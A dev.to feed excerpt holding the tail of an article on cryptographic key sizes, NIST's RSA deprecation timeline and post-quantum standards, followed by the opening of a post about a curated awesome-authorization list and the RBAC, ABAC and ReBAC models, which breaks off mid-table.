&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;256&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-256&lt;/td&gt;
&lt;td&gt;15360&lt;/td&gt;
&lt;td&gt;512+&lt;/td&gt;
&lt;td&gt;SHA-512&lt;/td&gt;
&lt;td&gt;✅ Long-term protection&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Read this table horizontally. &lt;strong&gt;Every entry in the same row provides the same security.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Look at the 128-bit security row: AES needs 128 bits, ECC needs 256 bits, and RSA needs &lt;strong&gt;3072 bits&lt;/strong&gt;. RSA requires 12x the key length of ECC and 24x that of AES for the same security level. At 192-bit security, RSA-7680 is needed, and that causes serious performance issues in TLS handshakes.&lt;/p&gt;

&lt;p&gt;The most important row right now is 112 bits. That is where RSA-2048 lives. It does not meet the current minimum recommendation of 128-bit security.&lt;/p&gt;


&lt;h2&gt;
  
  
  5. RSA-2048 Gets Deprecated in 2030
&lt;/h2&gt;

&lt;p&gt;By now you know that RSA-2048 only provides 112-bit security. But it is not getting disabled overnight. NIST has defined a phased transition schedule.&lt;/p&gt;
&lt;h3&gt;
  
  
  NIST Transition Timeline
&lt;/h3&gt;

&lt;p&gt;NIST IR 8547 (published November 2024) lays out the concrete timeline.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkzl73okdt4wex1zbiq6a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkzl73okdt4wex1zbiq6a.png" alt="timeline" width="654" height="293"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;When&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;th&gt;Scope&lt;/th&gt;
&lt;th&gt;What it means&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2030&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Deprecated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;RSA-2048 and other ≤112-bit algorithms&lt;/td&gt;
&lt;td&gt;No new deployments. Existing systems need a migration plan.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2035&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Disallowed&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;RSA-3072/4096, P-256, P-384, and&lt;br&gt;&lt;strong&gt;all&lt;/strong&gt; quantum-vulnerable public key crypto&lt;/td&gt;
&lt;td&gt;Completely prohibited in FIPS-compliant systems.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Take a close look at the 2035 row. RSA-3072, P-256, P-384: algorithms that are currently "recommended" will all be prohibited. This is not about security bits. It is about quantum computers breaking the algorithms at a fundamental level. The next section explains why making keys longer will not help.&lt;/p&gt;
&lt;h3&gt;
  
  
  The Gap Between 112 and 128 Bits Is Not "Just 16"
&lt;/h3&gt;

&lt;p&gt;You might think "112 vs 128, that is only 16 apart." But in security bits, the difference is exponential.&lt;/p&gt;

&lt;p&gt;$2^{128} \div 2^{112} = 2^{16} = 65,536$&lt;/p&gt;

&lt;p&gt;An attacker capable of breaking 112-bit security would need &lt;strong&gt;65,536 times&lt;/strong&gt; more computation to break 128-bit security. Put another way, 112-bit security is only $\frac{1}{65536}$ as hard to break as 128-bit.&lt;/p&gt;

&lt;p&gt;RSA-2048 is not going to be cracked tomorrow, not in 2026. But computing power improves every year. If you are encrypting data today with RSA-2048 that would be damaging if decrypted in 10 or 20 years (medical records, intellectual property, diplomatic communications), it is time to start thinking about migration.&lt;/p&gt;


&lt;h2&gt;
  
  
  6. Quantum Computers: Why Longer Keys Will Not Save You
&lt;/h2&gt;

&lt;p&gt;In section 5, I wrote that RSA-3072 and P-384 will be prohibited by 2035. If longer keys mean more security bits, why ban them?&lt;/p&gt;

&lt;p&gt;The answer is quantum computers. Quantum computers affect cryptography in two ways, and they are fundamentally different from each other.&lt;/p&gt;
&lt;h3&gt;
  
  
  Shor's Algorithm: Breaks Public Key Crypto at the Root
&lt;/h3&gt;

&lt;p&gt;Shor's algorithm solves integer factorization and the discrete logarithm problem in &lt;strong&gt;polynomial time&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;For RSA, this means the assumption that "factoring $N$ is astronomically hard" simply collapses. The discrete logarithm problem behind ECC falls the same way. No matter how long you make the key, the fundamental assumption the algorithm relies on is gone. Upgrade to RSA-4096, RSA-15360, it makes no difference against Shor.&lt;/p&gt;

&lt;p&gt;This is why "all quantum-vulnerable public key crypto is prohibited by 2035." It is not a key length issue. You &lt;strong&gt;have to change the algorithm itself&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;
  
  
  Grover's Algorithm: Halves Symmetric Crypto Security
&lt;/h3&gt;

&lt;p&gt;Grover's algorithm speeds up brute-force search from $2^n$ to $\sqrt{2^n} = 2^{n/2}$.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Symmetric Cipher&lt;/th&gt;
&lt;th&gt;Classical Security&lt;/th&gt;
&lt;th&gt;Quantum Security&lt;/th&gt;
&lt;th&gt;Verdict&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AES-128&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;128 bit&lt;/td&gt;
&lt;td&gt;→ &lt;strong&gt;64 bit&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;❌ Not enough&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AES-192&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;192 bit&lt;/td&gt;
&lt;td&gt;→ &lt;strong&gt;96 bit&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;⚠️ Marginal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AES-256&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;256 bit&lt;/td&gt;
&lt;td&gt;→ &lt;strong&gt;128 bit&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;✅ Sufficient&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;One caveat, though. These numbers assume Grover's algorithm running under ideal conditions. Actually attacking AES-128 with Grover would require tens of millions of logical qubits, which is orders of magnitude beyond current quantum computers (which have a few thousand physical qubits at best). Still, for long-term security, moving to AES-256 is the safe bet.&lt;/p&gt;

&lt;p&gt;The crucial difference from Shor is that Grover &lt;strong&gt;can be countered by using longer keys&lt;/strong&gt;. AES-256 maintains 128-bit security even against quantum computers. No need to change the algorithm. Just use longer keys.&lt;/p&gt;

&lt;p&gt;This is why NIST is saying "use AES-256, use SHA-384 or above."&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqpajkbjsoliqcx19j1so.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqpajkbjsoliqcx19j1so.png" alt="Quantum" width="611" height="506"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h2&gt;
  
  
  7. Harvest Now, Decrypt Later: Today's Data, Broken Tomorrow
&lt;/h2&gt;

&lt;p&gt;"Practical quantum computers are still years away, right?"&lt;/p&gt;

&lt;p&gt;That is the most dangerous assumption. There is an attack model called Harvest Now, Decrypt Later (HNDL).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1mvfdid1kg9omwptih0h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1mvfdid1kg9omwptih0h.png" alt="Attack" width="736" height="606"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Attackers intercept encrypted data &lt;strong&gt;now&lt;/strong&gt; and store it, then decrypt it once quantum computers become viable. The NSA and CISA have warned that nation-state actors are already in this "collection phase."&lt;/p&gt;

&lt;p&gt;The critical question is: how long does your data need to stay confidential? If a medical record encrypted today gets decrypted 20 years from now, that is a real data breach. Before quantum computers arrive, long-lived sensitive data needs to be re-protected with quantum-resistant methods.&lt;/p&gt;


&lt;h2&gt;
  
  
  8. Post-Quantum Cryptography (PQC) Key Sizes
&lt;/h2&gt;

&lt;p&gt;So what cryptography can actually withstand quantum computers? In August 2024, NIST officially published three post-quantum cryptography standards.&lt;/p&gt;
&lt;h3&gt;
  
  
  ML-KEM (FIPS 203): Key Encapsulation
&lt;/h3&gt;

&lt;p&gt;Formerly known as CRYSTALS-Kyber. Replaces RSA key exchange and ECDH.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Security&lt;/th&gt;
&lt;th&gt;Public Key&lt;/th&gt;
&lt;th&gt;Ciphertext&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML-KEM-512&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-128 equiv.&lt;/td&gt;
&lt;td&gt;800 bytes&lt;/td&gt;
&lt;td&gt;768 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML-KEM-768&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-192 equiv.&lt;/td&gt;
&lt;td&gt;1,184 bytes&lt;/td&gt;
&lt;td&gt;1,088 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML-KEM-1024&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-256 equiv.&lt;/td&gt;
&lt;td&gt;1,568 bytes&lt;/td&gt;
&lt;td&gt;1,568 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h3&gt;
  
  
  ML-DSA (FIPS 204): Digital Signatures
&lt;/h3&gt;

&lt;p&gt;Formerly known as CRYSTALS-Dilithium. Replaces RSA signatures and ECDSA.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Security&lt;/th&gt;
&lt;th&gt;Public Key&lt;/th&gt;
&lt;th&gt;Signature&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML-DSA-44&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-128 equiv.&lt;/td&gt;
&lt;td&gt;1,312 bytes&lt;/td&gt;
&lt;td&gt;2,420 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML-DSA-65&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-192 equiv.&lt;/td&gt;
&lt;td&gt;1,952 bytes&lt;/td&gt;
&lt;td&gt;3,309 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ML-DSA-87&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-256 equiv.&lt;/td&gt;
&lt;td&gt;2,592 bytes&lt;/td&gt;
&lt;td&gt;4,627 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h3&gt;
  
  
  SLH-DSA (FIPS 205): Hash-Based Signatures
&lt;/h3&gt;

&lt;p&gt;Formerly known as SPHINCS+. Positioned as a backup for ML-DSA. It relies on a different mathematical foundation (hash functions) than the lattice-based ML-DSA, so it serves as insurance in case a vulnerability is found in ML-DSA.&lt;/p&gt;
&lt;h3&gt;
  
  
  Comparing Legacy Crypto and PQC Key Sizes
&lt;/h3&gt;

&lt;p&gt;This is where PQC hurts. Quantum resistance comes at the cost of larger keys and signatures.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;ECDSA P-256&lt;/th&gt;
&lt;th&gt;RSA-3072&lt;/th&gt;
&lt;th&gt;ML-DSA-65&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Public Key&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;64 bytes&lt;/td&gt;
&lt;td&gt;384 bytes&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;1,952 bytes&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Signature&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;64 bytes&lt;/td&gt;
&lt;td&gt;384 bytes&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;3,309 bytes&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Security&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;128 bit&lt;/td&gt;
&lt;td&gt;128 bit&lt;/td&gt;
&lt;td&gt;192 bit (quantum-resistant)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;ML-DSA-65's public key is &lt;strong&gt;roughly 30x&lt;/strong&gt; that of ECDSA P-256. This directly impacts TLS handshake sizes and certificate chains. That is why hybrid approaches (combining legacy crypto + PQC) are currently recommended. The transition will be gradual, not a full switchover all at once.&lt;/p&gt;


&lt;h2&gt;
  
  
  9. What to Do in 2026
&lt;/h2&gt;

&lt;p&gt;Theory is great. But what should you actually do?&lt;/p&gt;
&lt;h3&gt;
  
  
  Start with a Crypto Inventory
&lt;/h3&gt;

&lt;p&gt;Figuring out what your systems are currently using is step one.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check your server's TLS certificate&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; | openssl s_client &lt;span class="nt"&gt;-connect&lt;/span&gt; example.com:443 2&amp;gt;/dev/null &lt;span class="se"&gt;\&lt;/span&gt;
  | openssl x509 &lt;span class="nt"&gt;-noout&lt;/span&gt; &lt;span class="nt"&gt;-text&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s2"&gt;"Public Key Algorithm|Public-Key"&lt;/span&gt;

&lt;span class="c"&gt;# Check your SSH keys&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;key &lt;span class="k"&gt;in&lt;/span&gt; ~/.ssh/id_&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;ssh-keygen &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$key&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; 2&amp;gt;/dev/null
&lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;What to check:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Are your TLS certificates using ECDSA (P-256 or above)? If they are still RSA-2048, start planning the migration.&lt;/li&gt;
&lt;li&gt;Are your SSH keys Ed25519? If they are still RSA-2048, regenerate them with &lt;code&gt;ssh-keygen -t ed25519&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Are your JWT signatures using ES256 / EdDSA? If RS256, consider switching.&lt;/li&gt;
&lt;li&gt;Are you using AES-256 for symmetric encryption? Migrate long-lived data from AES-128.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Build Crypto Agility into Your Architecture
&lt;/h3&gt;

&lt;p&gt;No cryptographic algorithm lasts forever. RSA and ECC both have expiration dates.&lt;/p&gt;

&lt;p&gt;The important thing is to not hardcode algorithms. Make them configurable via config files or environment variables so that when NIST publishes new recommendations, you can switch with a config change. If you have to rewrite code and redeploy to every environment, you are looking at months of work.&lt;/p&gt;

&lt;p&gt;Combined with shorter certificate lifetimes (SC-081v3 brings the max down to 47 days by 2029), you can automatically switch algorithms at the next renewal cycle. If you are already auto-renewing certificates with ACME, the PQC transition is a natural extension of that.&lt;/p&gt;




&lt;h2&gt;
  
  
  Takeaways
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Key length and security bits are different things.&lt;/strong&gt; AES-128 has 128-bit security, but RSA-2048 only has 112. The efficiency of the best known attack against each algorithm determines how many key bits it actually needs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why ECC gets away with short keys.&lt;/strong&gt; GNFS against RSA runs in sub-exponential time, and the security decay ratio gets worse with longer keys (roughly 1/18 for RSA-2048, roughly 1/60 for RSA-15360). Pollard's rho against ECC stays at 1/2 regardless, so short keys provide equal or better security.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RSA-2048 gets deprecated in 2030.&lt;/strong&gt; Per NIST IR 8547. By 2035, all quantum-vulnerable public key crypto, including RSA-3072, P-256, and P-384, will be prohibited.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Quantum computers are not a key length problem.&lt;/strong&gt; Shor's algorithm destroys RSA and ECC at the algorithmic level. Longer keys do not help. Migration to post-quantum crypto (ML-KEM, ML-DSA) is required.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Grover's algorithm can be handled with longer keys.&lt;/strong&gt; It halves AES security, but AES-256 still maintains 128-bit security.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Run a crypto inventory now.&lt;/strong&gt; Know what your systems are using and build in crypto agility.&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/sp/800-57-part-1/rev-5/final" rel="noopener noreferrer"&gt;NIST SP 800-57 Part 1 Rev. 5: Recommendation for Key Management&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/sp/800-131a/rev-2/final" rel="noopener noreferrer"&gt;NIST SP 800-131A Rev. 2: Transitioning the Use of Cryptographic Algorithms and Key Lengths&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/nistir/8547/final" rel="noopener noreferrer"&gt;NIST IR 8547: Transition to Post-Quantum Cryptography Standards&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/fips/203/final" rel="noopener noreferrer"&gt;FIPS 203: Module-Lattice-Based Key-Encapsulation Mechanism Standard (ML-KEM)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/fips/204/final" rel="noopener noreferrer"&gt;FIPS 204: Module-Lattice-Based Digital Signature Standard (ML-DSA)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/fips/205/final" rel="noopener noreferrer"&gt;FIPS 205: Stateless Hash-Based Digital Signature Standard (SLH-DSA)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defense.gov/2022/Sep/07/2003071834/-1/-1/0/CSA_CNSA_2.0_ALGORITHMS_.PDF" rel="noopener noreferrer"&gt;CNSA 2.0: Commercial National Security Algorithm Suite&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/projects/post-quantum-cryptography" rel="noopener noreferrer"&gt;NIST Post-Quantum Cryptography: Resource Center&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>cryptography</category>
      <category>beginners</category>
      <category>todayilearned</category>
    </item>
    <item>
      <title>Why I Built awesome-authorization: Mapping the World of Auth Engines onto a Single Page</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Sat, 18 Apr 2026 15:16:48 +0000</pubDate>
      <link>https://dev.to/kanywst/why-i-built-awesome-authorization-mapping-the-world-of-auth-engines-onto-a-single-page-4mof</link>
      <guid>https://dev.to/kanywst/why-i-built-awesome-authorization-mapping-the-world-of-auth-engines-onto-a-single-page-4mof</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;"Which authorization engine should I use?"&lt;/p&gt;

&lt;p&gt;Very few people can answer this instantly. OPA, Cedar, OpenFGA, SpiceDB, Casbin, Cerbos... That’s six just off the top of my head. They are based on entirely different access control models (RBAC, ABAC, ReBAC), with different design philosophies and use cases.&lt;/p&gt;

&lt;p&gt;I've always been an auth nerd. I wrote an AuthZEN-compatible plugin for OPA, read through the SPIFFE/SPIRE implementations, and deep-dived into the Google Zanzibar paper. Through all of this, I realized something: &lt;strong&gt;There is no single place to get a bird's-eye view of the entire authorization landscape.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A repository called &lt;code&gt;awesome-authorization&lt;/code&gt; already existed. However, it was mostly a collection of articles and concepts—it didn't answer the practical question of "What engines actually exist and how do they differ?". With AuthZEN 1.0 officially approved, the authorization space is moving fast, but the information is too scattered to track.&lt;/p&gt;

&lt;p&gt;So, I built one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/kanywst/awesome-authorization" rel="noopener noreferrer"&gt;awesome-authorization&lt;/a&gt;&lt;/strong&gt; : A curated list of tools, frameworks, standards, and learning resources for authorization and access control.&lt;/p&gt;

&lt;p&gt;In this post, I want to explain why this list needed to exist and map out the state of authorization engines in 2026.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. Setting the Stage: PEP vs. PDP
&lt;/h2&gt;

&lt;p&gt;Before looking at the engines themselves, let's clarify where authorization sits within the architecture and what exactly an authorization engine—or Policy Decision Point (PDP)—does.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8stievz85oupu3uzc5eu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8stievz85oupu3uzc5eu.png" alt="PEP vs PDP" width="442" height="866"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Authentication (Who are you?) → Token Issuance → Authorization (What can you do?) → Resource Access. In this flow, the authorization engine (PDP) and the AuthZEN API are strictly responsible for step 4: "Query AuthZ Decision."&lt;/p&gt;

&lt;p&gt;OAuth 2.0 and AuthZEN operate on different layers. OAuth is about passing tokens between a client and a resource server. AuthZEN is about the application asking a policy engine for a decision. I see articles conflating these two all the time, but they are entirely different beasts.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. The Cambrian Explosion of Authorization Engines
&lt;/h2&gt;

&lt;p&gt;Let’s look at reality. As of April 2026, here is what the major authorization engine landscape looks like.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5925j57q2lqixw8i49zv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5925j57q2lqixw8i49zv.png" alt="Authorization Engines" width="800" height="488"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That's a lot. And while they might look similar from the outside, their foundational design philosophies are radically different.&lt;/p&gt;




&lt;h2&gt;
  
  
  3. You Can't Choose If You Don't Know the Models
&lt;/h2&gt;

&lt;p&gt;The very first thing to understand when picking an authorization engine is the underlying &lt;strong&gt;access control model&lt;/strong&gt;. If you skip this, you will inevitably hit a wall where the engine simply cannot express your use case.&lt;/p&gt;

&lt;h3&gt;
  
  
  RBAC: Managing by Roles
&lt;/h3&gt;

&lt;p&gt;The simplest approach. Assign roles to users, and bind permissions to those roles.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5gndnd1zet8ipx8gl9w9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5gndnd1zet8ipx8gl9w9.png" alt="RBAC" width="557" height="157"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Kubernetes RBAC is a perfect example. It's simple, but as conditions grow, you suffer from Role Explosion. Try expressing "Only full-time engineers in the Tokyo office assigned to Project A can access the production environment" in strict RBAC. The number of role permutations becomes unmanageable.&lt;/p&gt;

&lt;h3&gt;
  
  
  ABAC: Deciding by Attributes
&lt;/h3&gt;

&lt;p&gt;Decisions are evaluated based on the &lt;strong&gt;attributes&lt;/strong&gt; of the user, the resource, and the environment.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1fk1k1i34y54tvdx5wib.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1fk1k1i34y54tvdx5wib.png" alt="ABAC" width="800" height="109"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is where OPA (Rego) and Cedar shine. It’s highly flexible, but the policies themselves can get complicated very quickly.&lt;/p&gt;

&lt;h3&gt;
  
  
  ReBAC: Deciding by Relationships
&lt;/h3&gt;

&lt;p&gt;Coined by the Google Zanzibar paper. It manages &lt;strong&gt;relationships&lt;/strong&gt; as a graph—for example, "alice is a viewer of doc:readme," or "all members of the eng group are viewers."&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmrkbnp4rs5k333b3j40e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmrkbnp4rs5k333b3j40e.png" alt="ReBac" width="527" height="321"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;SpiceDB, OpenFGA, and Permify implement this model. It operates identically to how sharing works in Google Drive, making it the most natural fit for collaborative apps. However, it struggles with attribute-based conditions like "allow access only during business hours."&lt;/p&gt;

&lt;h3&gt;
  
  
  So, Which One Should You Use?
&lt;/h3&gt;

&lt;p&gt;Roughly speaking:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What you want to do&lt;/th&gt;
&lt;th&gt;Model&lt;/th&gt;
